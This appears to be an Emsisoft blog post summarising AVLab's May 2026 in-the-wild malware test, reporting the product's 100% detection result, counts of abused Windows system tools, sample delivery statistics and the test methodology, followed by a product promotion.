The May 2026 Advanced In-The-Wild Malware Test from AVLab Cybersecurity Foundation evaluated 14 security solutions against 360 unique malware samples. Emsisoft Enterprise Security + EDR achieved 100% detection, earning EXCELLENT certification under the 99.6% protection threshold.
This test edition also highlighted the growing use of legitimate Windows tools (LOLBins) and the importance of telemetry and incident reconstruction capabilities.
The evolving role of LOLBins in modern attacks
The May test confirmed that cybercriminals are increasingly relying on legitimate system components to evade detection. Among the most frequently observed LOLBins were:
svchost.exe: 19,230 invocationscertutil.exe: 11,348sh.exe: 5,102taskhostw.exe: 4,050rundll32.exe: 2,695taskkill.exe: 2,060
These tools were used to download files, execute code, carry out commands, and communicate with attacker infrastructure. The analysis also revealed use of less common utilities including tor.exe (1,466 occurrences), curl.exe, sftp.exe, ssh.exe, ftp.exe, nslookup.exe, git.exe, and msbuild.exe.
The presence of tor.exe at significant volume indicates attackers are actively anonymizing network communication to hinder infrastructure analysis. Additionally, Microsoft’s native integration of Linux commands via Coreutils tools represents a new vector that AVLab will examine in future test editions.
The continued reliance on LOLBins demonstrates that process-based detection alone is insufficient. Behavioral analysis and comprehensive telemetry are required to distinguish malicious activity from legitimate system operations.
Threat landscape and sample composition
The May 2026 test comprised 360 malware samples. Of these, 318 were delivered over HTTP and 42 over HTTPS. Compromised servers were located primarily in the United States (179), Germany (51), and China (30).
HTTPS delivery remains a challenge for reputation-based detection mechanisms. SSL certificates indicate encryption, not safety, and attackers increasingly use encrypted channels to deliver payloads. The continued presence of HTTPS-delivered malware reinforces that URL reputation and blacklist-based approaches have limitations, as they require time to propagate threat intelligence.
Emsisoft’s performance: Detection and visibility
Emsisoft Enterprise Security + EDR blocked all 360 samples, achieving 100% detection and EXCELLENT certification.
Defense distribution:
- Web-layer protection (pre-execution): 84.72%
- Runtime defense (post-execution): 15.28%
Remediation time:
2.69 seconds average. This metric measures complete threat neutralization and system restoration, including removal of malicious artifacts and reversal of system changes.
The product was tested with its standard enterprise configuration: default settings, automatic PUP repair, EDR active, Rollback functionality enabled, and browser protection engaged. Testing with default configurations ensures results reflect the out-of-box experience for customers.
Read the full May test sumary here.
Test methodology and standards compliance
The Advanced In-The-Wild Malware Test is conducted six times annually. Each round evaluates products based on a full attack chain simulation with three complementary phases:
- Web-Layer Protection (Pre-Execution): Checks whether the solution blocks a threat before execution, including at the network layer, during file download, or upon first access to a malicious resource.
- Runtime Defense (Post-Execution): Evaluates product response once code has executed. This stage reflects zero-day scenarios and fileless in-memory attacks.
- Remediation Time: Measures the time and effectiveness of full incident response, including threat neutralization and system restoration.
The test uses real malware samples obtained from active URLs, public threat intelligence feeds, honeypots, and monitored channels. Each sample undergoes SHA-256 hash comparison to eliminate duplicates, static analysis using YARA rules, and dynamic execution in Windows 11 to confirm malicious behavior before testing begins.
AVLab operates as a member of the Anti-Malware Testing Standards Organization (AMTSO) and complies with Microsoft Virus Initiative (MVI) requirements.
Conclusion
The May 2026 AVLab test results confirm that Emsisoft Enterprise Security + EDR continues to meet the increased 99.6% certification threshold, blocking all 360 malware samples.
Emsisoft Endpoint Protection: Award-Winning Security Made Simple
Experience effortless next-gen technology. Start Free TrialAs attackers increasingly leverage legitimate system tools and encrypted communication channels, the quality of telemetry and incident reconstruction capabilities become as critical as detection itself.